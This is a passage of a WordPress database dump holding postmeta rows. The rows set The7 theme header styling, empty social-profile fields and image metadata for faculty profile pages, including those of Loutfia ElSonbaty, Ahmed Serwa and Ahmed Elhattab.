(24981,3589,'_dt_fancy_header_bg_overlay','0'),
(24982,3589,'_dt_fancy_header_overlay_color','#000'),
(24983,3589,'_dt_fancy_header_bg_overlay_opacity','50'),
(24984,3589,'_dt_fancy_header_scroll_effect','default'),
(24985,3589,'_dt_fancy_header_bg_parallax','0.5'),
(24986,3589,'_dt_fancy_header_responsiveness_heading',''),
(24987,3589,'_dt_fancy_header_responsiveness','disabled'),
(24988,3589,'_dt_fancy_header_responsiveness_switch','778px'),
(24989,3589,'_dt_fancy_header_responsive_height','70'),
(24990,3589,'_dt_fancy_header_responsive_font_size','30'),
(24991,3589,'_dt_fancy_header_responsive_title_line_height','38'),
(24992,3589,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(24993,3589,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(24994,3589,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(24995,3589,'_dt_teammate_options_go_to_single','1'),
(24996,3589,'_dt_teammate_options_position',''),
(24997,3589,'_dt_teammate_options_website',''),
(24998,3589,'_dt_teammate_options_mail',''),
(24999,3589,'_dt_teammate_options_facebook',''),
(25000,3589,'_dt_teammate_options_twitter',''),
(25001,3589,'_dt_teammate_options_dribbble',''),
(25002,3589,'_dt_teammate_options_you-tube',''),
(25003,3589,'_dt_teammate_options_rss',''),
(25004,3589,'_dt_teammate_options_delicious',''),
(25005,3589,'_dt_teammate_options_flickr',''),
(25006,3589,'_dt_teammate_options_lastfm',''),
(25007,3589,'_dt_teammate_options_linkedin',''),
(25008,3589,'_dt_teammate_options_vimeo',''),
(25009,3589,'_dt_teammate_options_tumbler',''),
(25010,3589,'_dt_teammate_options_pinterest',''),
(25011,3589,'_dt_teammate_options_devian',''),
(25012,3589,'_dt_teammate_options_skype',''),
(25013,3589,'_dt_teammate_options_github',''),
(25014,3589,'_dt_teammate_options_instagram',''),
(25015,3589,'_dt_teammate_options_stumbleupon',''),
(25016,3589,'_dt_teammate_options_behance',''),
(25017,3589,'_dt_teammate_options_px-500',''),
(25018,3589,'_dt_teammate_options_tripedvisor',''),
(25019,3589,'_dt_teammate_options_vk',''),
(25020,3589,'_dt_teammate_options_foursquare',''),
(25021,3589,'_dt_teammate_options_xing',''),
(25022,3589,'_dt_teammate_options_weibo',''),
(25023,3589,'_dt_teammate_options_odnoklassniki',''),
(25024,3589,'_dt_teammate_options_research-gate',''),
(25025,3589,'_dt_teammate_options_yelp',''),
(25026,3589,'_dt_teammate_options_blogger',''),
(25027,3589,'_dt_teammate_options_soundcloud',''),
(25028,3589,'_dt_teammate_options_viber',''),
(25029,3589,'_dt_teammate_options_whatsapp',''),
(25030,3589,'_dt_teammate_options_reddit',''),
(25031,3589,'_dt_teammate_options_snapchat',''),
(25032,3589,'_dt_teammate_options_telegram',''),
(25033,3589,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(25034,3591,'_edit_lock','1673732287:1'),
(25035,3592,'_wp_attached_file','2023/01/loc8.jpg'),
(25036,3592,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:190;s:6:\"height\";i:259;s:4:\"file\";s:16:\"2023/01/loc8.jpg\";s:8:\"filesize\";i:45834;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"loc8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4700;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25037,3591,'_thumbnail_id','3592'),
(25038,3591,'_edit_last','1'),
(25039,3591,'_dt_sidebar_position','disabled'),
(25040,3591,'_dt_sidebar_widgetarea_id','sidebar_1'),
(25041,3591,'_dt_sidebar_hide_on_mobile','0'),
(25042,3591,'_dt_footer_show','1'),
(25043,3591,'_dt_footer_widgetarea_id','sidebar_2'),
(25044,3591,'_dt_footer_hide_on_mobile','0'),
(25045,3591,'_dt_header_title','fancy'),
(25046,3591,'_dt_header_background','normal'),
(25047,3591,'_dt_header_background_below_slideshow','disabled'),
(25048,3591,'_dt_header_transparent_bg_color_scheme','light'),
(25049,3591,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(25050,3591,'_dt_header_transparent_top_bar_bg_opacity','25'),
(25051,3591,'_dt_header_transparent_bg_color','#000000'),
(25052,3591,'_dt_header_transparent_bg_opacity','50'),
(25053,3591,'_dt_header_disabled_background','normal'),
(25054,3591,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(25055,3591,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(25056,3591,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(25057,3591,'_dt_header_disabled_transparent_bg_color','#000000'),
(25058,3591,'_dt_header_disabled_transparent_bg_opacity','50'),
(25059,3591,'_dt_page_overrides_top_margin',''),
(25060,3591,'_dt_page_overrides_right_margin',''),
(25061,3591,'_dt_page_overrides_bottom_margin',''),
(25062,3591,'_dt_page_overrides_left_margin',''),
(25063,3591,'_dt_mobile_page_padding_top',''),
(25064,3591,'_dt_mobile_page_padding_right',''),
(25065,3591,'_dt_mobile_page_padding_bottom',''),
(25066,3591,'_dt_mobile_page_padding_left',''),
(25067,3591,'_dt_fancy_header_layout_heading',''),
(25068,3591,'_dt_fancy_header_title_aligment','center'),
(25069,3591,'_dt_fancy_header_height','300'),
(25070,3591,'_dt_fancy_header_padding-top','0px'),
(25071,3591,'_dt_fancy_header_padding-bottom','0px'),
(25072,3591,'_dt_fancy_header_breadcrumbs_heading',''),
(25073,3591,'_dt_fancy_header_breadcrumbs','disabled'),
(25074,3591,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(25075,3591,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(25076,3591,'_dt_fancy_header_title_heading',''),
(25077,3591,'_dt_fancy_header_title_mode','custom'),
(25078,3591,'_dt_fancy_header_title','Dr.Eng. Loutfia ElSonbaty'),
(25079,3591,'_dt_fancy_header_title_font_size','30'),
(25080,3591,'_dt_fancy_header_title_line_height','36'),
(25081,3591,'_dt_fancy_header_text_transform','none'),
(25082,3591,'_dt_fancy_header_title_color_mode','color'),
(25083,3591,'_dt_fancy_header_title_color','#ffffff'),
(25084,3591,'_dt_fancy_header_subtitle_heading',''),
(25085,3591,'_dt_fancy_header_subtitle',''),
(25086,3591,'_dt_fancy_header_subtitle_font_size','18'),
(25087,3591,'_dt_fancy_header_subtitle_line_height','26'),
(25088,3591,'_dt_fancy_header_subtitle_text_transform','none'),
(25089,3591,'_dt_fancy_header_subtitle_color_mode','color'),
(25090,3591,'_dt_fancy_header_subtitle_color','#ffffff'),
(25091,3591,'_dt_fancy_header_bg_heading',''),
(25092,3591,'_dt_fancy_header_bg_color','#222222'),
(25093,3591,'_dt_fancy_header_bg_image_origin','custom'),
(25094,3591,'_dt_fancy_header_bg_image','a:0:{}'),
(25095,3591,'_dt_fancy_header_bg_repeat','no-repeat'),
(25096,3591,'_dt_fancy_header_bg_position_x','center'),
(25097,3591,'_dt_fancy_header_bg_position_y','center'),
(25098,3591,'_dt_fancy_header_bg_fullscreen','1'),
(25099,3591,'_dt_fancy_header_bg_overlay','0'),
(25100,3591,'_dt_fancy_header_overlay_color','#000'),
(25101,3591,'_dt_fancy_header_bg_overlay_opacity','50'),
(25102,3591,'_dt_fancy_header_scroll_effect','default'),
(25103,3591,'_dt_fancy_header_bg_parallax','0.5'),
(25104,3591,'_dt_fancy_header_responsiveness_heading',''),
(25105,3591,'_dt_fancy_header_responsiveness','disabled'),
(25106,3591,'_dt_fancy_header_responsiveness_switch','778px'),
(25107,3591,'_dt_fancy_header_responsive_height','70'),
(25108,3591,'_dt_fancy_header_responsive_font_size','30'),
(25109,3591,'_dt_fancy_header_responsive_title_line_height','38'),
(25110,3591,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(25111,3591,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(25112,3591,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(25113,3591,'_dt_teammate_options_go_to_single','1'),
(25114,3591,'_dt_teammate_options_position',''),
(25115,3591,'_dt_teammate_options_website',''),
(25116,3591,'_dt_teammate_options_mail',''),
(25117,3591,'_dt_teammate_options_facebook',''),
(25118,3591,'_dt_teammate_options_twitter',''),
(25119,3591,'_dt_teammate_options_dribbble',''),
(25120,3591,'_dt_teammate_options_you-tube',''),
(25121,3591,'_dt_teammate_options_rss',''),
(25122,3591,'_dt_teammate_options_delicious',''),
(25123,3591,'_dt_teammate_options_flickr',''),
(25124,3591,'_dt_teammate_options_lastfm',''),
(25125,3591,'_dt_teammate_options_linkedin',''),
(25126,3591,'_dt_teammate_options_vimeo',''),
(25127,3591,'_dt_teammate_options_tumbler',''),
(25128,3591,'_dt_teammate_options_pinterest',''),
(25129,3591,'_dt_teammate_options_devian',''),
(25130,3591,'_dt_teammate_options_skype',''),
(25131,3591,'_dt_teammate_options_github',''),
(25132,3591,'_dt_teammate_options_instagram',''),
(25133,3591,'_dt_teammate_options_stumbleupon',''),
(25134,3591,'_dt_teammate_options_behance',''),
(25135,3591,'_dt_teammate_options_px-500',''),
(25136,3591,'_dt_teammate_options_tripedvisor',''),
(25137,3591,'_dt_teammate_options_vk',''),
(25138,3591,'_dt_teammate_options_foursquare',''),
(25139,3591,'_dt_teammate_options_xing',''),
(25140,3591,'_dt_teammate_options_weibo',''),
(25141,3591,'_dt_teammate_options_odnoklassniki',''),
(25142,3591,'_dt_teammate_options_research-gate',''),
(25143,3591,'_dt_teammate_options_yelp',''),
(25144,3591,'_dt_teammate_options_blogger',''),
(25145,3591,'_dt_teammate_options_soundcloud',''),
(25146,3591,'_dt_teammate_options_viber',''),
(25147,3591,'_dt_teammate_options_whatsapp',''),
(25148,3591,'_dt_teammate_options_reddit',''),
(25149,3591,'_dt_teammate_options_snapchat',''),
(25150,3591,'_dt_teammate_options_telegram',''),
(25151,3591,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(25152,3593,'_edit_lock','1673730755:1'),
(25153,3594,'_wp_attached_file','2023/01/loc9.jpg'),
(25154,3594,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:122;s:6:\"height\";i:182;s:4:\"file\";s:16:\"2023/01/loc9.jpg\";s:8:\"filesize\";i:32214;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"loc9-122x150.jpg\";s:5:\"width\";i:122;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4494;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25155,3593,'_thumbnail_id','3594'),
(25156,3593,'_edit_last','1'),
(25157,3593,'_dt_sidebar_position','disabled'),
(25158,3593,'_dt_sidebar_widgetarea_id','sidebar_1'),
(25159,3593,'_dt_sidebar_hide_on_mobile','0'),
(25160,3593,'_dt_footer_show','1'),
(25161,3593,'_dt_footer_widgetarea_id','sidebar_2'),
(25162,3593,'_dt_footer_hide_on_mobile','0'),
(25163,3593,'_dt_header_title','fancy'),
(25164,3593,'_dt_header_background','normal'),
(25165,3593,'_dt_header_background_below_slideshow','disabled'),
(25166,3593,'_dt_header_transparent_bg_color_scheme','light'),
(25167,3593,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(25168,3593,'_dt_header_transparent_top_bar_bg_opacity','25'),
(25169,3593,'_dt_header_transparent_bg_color','#000000'),
(25170,3593,'_dt_header_transparent_bg_opacity','50'),
(25171,3593,'_dt_header_disabled_background','normal'),
(25172,3593,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(25173,3593,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(25174,3593,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(25175,3593,'_dt_header_disabled_transparent_bg_color','#000000'),
(25176,3593,'_dt_header_disabled_transparent_bg_opacity','50'),
(25177,3593,'_dt_page_overrides_top_margin',''),
(25178,3593,'_dt_page_overrides_right_margin',''),
(25179,3593,'_dt_page_overrides_bottom_margin',''),
(25180,3593,'_dt_page_overrides_left_margin',''),
(25181,3593,'_dt_mobile_page_padding_top',''),
(25182,3593,'_dt_mobile_page_padding_right',''),
(25183,3593,'_dt_mobile_page_padding_bottom',''),
(25184,3593,'_dt_mobile_page_padding_left',''),
(25185,3593,'_dt_fancy_header_layout_heading',''),
(25186,3593,'_dt_fancy_header_title_aligment','center'),
(25187,3593,'_dt_fancy_header_height','300'),
(25188,3593,'_dt_fancy_header_padding-top','0px'),
(25189,3593,'_dt_fancy_header_padding-bottom','0px'),
(25190,3593,'_dt_fancy_header_breadcrumbs_heading',''),
(25191,3593,'_dt_fancy_header_breadcrumbs','disabled'),
(25192,3593,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(25193,3593,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(25194,3593,'_dt_fancy_header_title_heading',''),
(25195,3593,'_dt_fancy_header_title_mode','custom'),
(25196,3593,'_dt_fancy_header_title','Assoc. Prof. Dr. Eng. Ahmed Serwa'),
(25197,3593,'_dt_fancy_header_title_font_size','30'),
(25198,3593,'_dt_fancy_header_title_line_height','36'),
(25199,3593,'_dt_fancy_header_text_transform','none'),
(25200,3593,'_dt_fancy_header_title_color_mode','color'),
(25201,3593,'_dt_fancy_header_title_color','#ffffff'),
(25202,3593,'_dt_fancy_header_subtitle_heading',''),
(25203,3593,'_dt_fancy_header_subtitle',''),
(25204,3593,'_dt_fancy_header_subtitle_font_size','18'),
(25205,3593,'_dt_fancy_header_subtitle_line_height','26'),
(25206,3593,'_dt_fancy_header_subtitle_text_transform','none'),
(25207,3593,'_dt_fancy_header_subtitle_color_mode','color'),
(25208,3593,'_dt_fancy_header_subtitle_color','#ffffff'),
(25209,3593,'_dt_fancy_header_bg_heading',''),
(25210,3593,'_dt_fancy_header_bg_color','#222222'),
(25211,3593,'_dt_fancy_header_bg_image_origin','custom'),
(25212,3593,'_dt_fancy_header_bg_image','a:0:{}'),
(25213,3593,'_dt_fancy_header_bg_repeat','no-repeat'),
(25214,3593,'_dt_fancy_header_bg_position_x','center'),
(25215,3593,'_dt_fancy_header_bg_position_y','center'),
(25216,3593,'_dt_fancy_header_bg_fullscreen','1'),
(25217,3593,'_dt_fancy_header_bg_overlay','0'),
(25218,3593,'_dt_fancy_header_overlay_color','#000'),
(25219,3593,'_dt_fancy_header_bg_overlay_opacity','50'),
(25220,3593,'_dt_fancy_header_scroll_effect','default'),
(25221,3593,'_dt_fancy_header_bg_parallax','0.5'),
(25222,3593,'_dt_fancy_header_responsiveness_heading',''),
(25223,3593,'_dt_fancy_header_responsiveness','disabled'),
(25224,3593,'_dt_fancy_header_responsiveness_switch','778px'),
(25225,3593,'_dt_fancy_header_responsive_height','70'),
(25226,3593,'_dt_fancy_header_responsive_font_size','30'),
(25227,3593,'_dt_fancy_header_responsive_title_line_height','38'),
(25228,3593,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(25229,3593,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(25230,3593,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(25231,3593,'_dt_teammate_options_go_to_single','1'),
(25232,3593,'_dt_teammate_options_position',''),
(25233,3593,'_dt_teammate_options_website',''),
(25234,3593,'_dt_teammate_options_mail',''),
(25235,3593,'_dt_teammate_options_facebook',''),
(25236,3593,'_dt_teammate_options_twitter',''),
(25237,3593,'_dt_teammate_options_dribbble',''),
(25238,3593,'_dt_teammate_options_you-tube',''),
(25239,3593,'_dt_teammate_options_rss',''),
(25240,3593,'_dt_teammate_options_delicious',''),
(25241,3593,'_dt_teammate_options_flickr',''),
(25242,3593,'_dt_teammate_options_lastfm',''),
(25243,3593,'_dt_teammate_options_linkedin',''),
(25244,3593,'_dt_teammate_options_vimeo',''),
(25245,3593,'_dt_teammate_options_tumbler',''),
(25246,3593,'_dt_teammate_options_pinterest',''),
(25247,3593,'_dt_teammate_options_devian',''),
(25248,3593,'_dt_teammate_options_skype',''),
(25249,3593,'_dt_teammate_options_github',''),
(25250,3593,'_dt_teammate_options_instagram',''),
(25251,3593,'_dt_teammate_options_stumbleupon',''),
(25252,3593,'_dt_teammate_options_behance',''),
(25253,3593,'_dt_teammate_options_px-500',''),
(25254,3593,'_dt_teammate_options_tripedvisor',''),
(25255,3593,'_dt_teammate_options_vk',''),
(25256,3593,'_dt_teammate_options_foursquare',''),
(25257,3593,'_dt_teammate_options_xing',''),
(25258,3593,'_dt_teammate_options_weibo',''),
(25259,3593,'_dt_teammate_options_odnoklassniki',''),
(25260,3593,'_dt_teammate_options_research-gate',''),
(25261,3593,'_dt_teammate_options_yelp',''),
(25262,3593,'_dt_teammate_options_blogger',''),
(25263,3593,'_dt_teammate_options_soundcloud',''),
(25264,3593,'_dt_teammate_options_viber',''),
(25265,3593,'_dt_teammate_options_whatsapp',''),
(25266,3593,'_dt_teammate_options_reddit',''),
(25267,3593,'_dt_teammate_options_snapchat',''),
(25268,3593,'_dt_teammate_options_telegram',''),
(25269,3593,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(25270,3595,'_edit_lock','1674361539:1'),
(25271,3596,'_wp_attached_file','2023/01/loc10.jpg'),
(25272,3596,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:143;s:6:\"height\";i:192;s:4:\"file\";s:17:\"2023/01/loc10.jpg\";s:8:\"filesize\";i:32404;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"loc10-143x150.jpg\";s:5:\"width\";i:143;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4343;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(25273,3595,'_thumbnail_id','3596'),
(25274,3595,'_edit_last','1'),
(25275,3595,'_dt_sidebar_position','disabled'),
(25276,3595,'_dt_sidebar_widgetarea_id','sidebar_1'),
(25277,3595,'_dt_sidebar_hide_on_mobile','0'),
(25278,3595,'_dt_footer_show','1'),
(25279,3595,'_dt_footer_widgetarea_id','sidebar_2'),
(25280,3595,'_dt_footer_hide_on_mobile','0'),
(25281,3595,'_dt_header_title','fancy'),
(25282,3595,'_dt_header_background','normal'),
(25283,3595,'_dt_header_background_below_slideshow','disabled'),
(25284,3595,'_dt_header_transparent_bg_color_scheme','light'),
(25285,3595,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(25286,3595,'_dt_header_transparent_top_bar_bg_opacity','25'),
(25287,3595,'_dt_header_transparent_bg_color','#000000'),
(25288,3595,'_dt_header_transparent_bg_opacity','50'),
(25289,3595,'_dt_header_disabled_background','normal'),
(25290,3595,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(25291,3595,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(25292,3595,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(25293,3595,'_dt_header_disabled_transparent_bg_color','#000000'),
(25294,3595,'_dt_header_disabled_transparent_bg_opacity','50'),
(25295,3595,'_dt_page_overrides_top_margin',''),
(25296,3595,'_dt_page_overrides_right_margin',''),
(25297,3595,'_dt_page_overrides_bottom_margin',''),
(25298,3595,'_dt_page_overrides_left_margin',''),
(25299,3595,'_dt_mobile_page_padding_top',''),
(25300,3595,'_dt_mobile_page_padding_right',''),
(25301,3595,'_dt_mobile_page_padding_bottom',''),
(25302,3595,'_dt_mobile_page_padding_left',''),
(25303,3595,'_dt_fancy_header_layout_heading',''),
(25304,3595,'_dt_fancy_header_title_aligment','center'),
(25305,3595,'_dt_fancy_header_height','300'),
(25306,3595,'_dt_fancy_header_padding-top','0px'),
(25307,3595,'_dt_fancy_header_padding-bottom','0px'),
(25308,3595,'_dt_fancy_header_breadcrumbs_heading',''),
(25309,3595,'_dt_fancy_header_breadcrumbs','disabled'),
(25310,3595,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(25311,3595,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(25312,3595,'_dt_fancy_header_title_heading',''),
(25313,3595,'_dt_fancy_header_title_mode','custom'),
(25314,3595,'_dt_fancy_header_title','Prof.  Ahmed Elhattab'),
(25315,3595,'_dt_fancy_header_title_font_size','30'),
(25316,3595,'_dt_fancy_header_title_line_height','36'),
(25317,3595,'_dt_fancy_header_text_transform','none'),
(25318,3595,'_dt_fancy_header_title_color_mode','color'),
(25319,3595,'_dt_fancy_header_title_color','#ffffff'),
(25320,3595,'_dt_fancy_header_subtitle_heading',''),
(25321,3595,'_dt_fancy_header_subtitle',''),
(25322,3595,'_dt_fancy_header_subtitle_font_size','18'),
(25323,3595,'_dt_fancy_header_subtitle_line_height','26'),
(25324,3595,'_dt_fancy_header_subtitle_text_transform','none'),
(25325,3595,'_dt_fancy_header_subtitle_color_mode','color'),
(25326,3595,'_dt_fancy_header_subtitle_color','#ffffff'),
(25327,3595,'_dt_fancy_header_bg_heading',''),
(25328,3595,'_dt_fancy_header_bg_color','#222222'),
(25329,3595,'_dt_fancy_header_bg_image_origin','custom'),
(25330,3595,'_dt_fancy_header_bg_image','a:0:{}'),
(25331,3595,'_dt_fancy_header_bg_repeat','no-repeat'),
(25332,3595,'_dt_fancy_header_bg_position_x','center'),
(25333,3595,'_dt_fancy_header_bg_position_y','center'),
(25334,3595,'_dt_fancy_header_bg_fullscreen','1'),
(25335,3595,'_dt_fancy_header_bg_overlay','0'),
(25336,3595,'_dt_fancy_header_overlay_color','#000'),
(25337,3595,'_dt_fancy_header_bg_overlay_opacity','50'),
(25338,3595,'_dt_fancy_header_scroll_effect','default'),
(25339,3595,'_dt_fancy_header_bg_parallax','0.5'),
(25340,3595,'_dt_fancy_header_responsiveness_heading',''),
(25341,3595,'_dt_fancy_header_responsiveness','enabled'),
(25342,3595,'_dt_fancy_header_responsiveness_switch','778px'),
(25343,3595,'_dt_fancy_header_responsive_height','70'),
(25344,3595,'_dt_fancy_header_responsive_font_size','30'),
(25345,3595,'_dt_fancy_header_responsive_title_line_height','38'),
(25346,3595,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(25347,3595,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(25348,3595,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(25349,3595,'_dt_teammate_options_go_to_single','1'),
(25350,3595,'_dt_teammate_options_position',''),
(25351,3595,'_dt_teammate_options_website',''),
(25352,3595,'_dt_teammate_options_mail',''),
(25353,3595,'_dt_teammate_options_facebook',''),
(25354,3595,'_dt_teammate_options_twitter',''),
(25355,3595,'_dt_teammate_options_dribbble',''),
(25356,3595,'_dt_teammate_options_you-tube',''),
(25357,3595,'_dt_teammate_options_rss',''),
(25358,3595,'_dt_teammate_options_delicious',''),
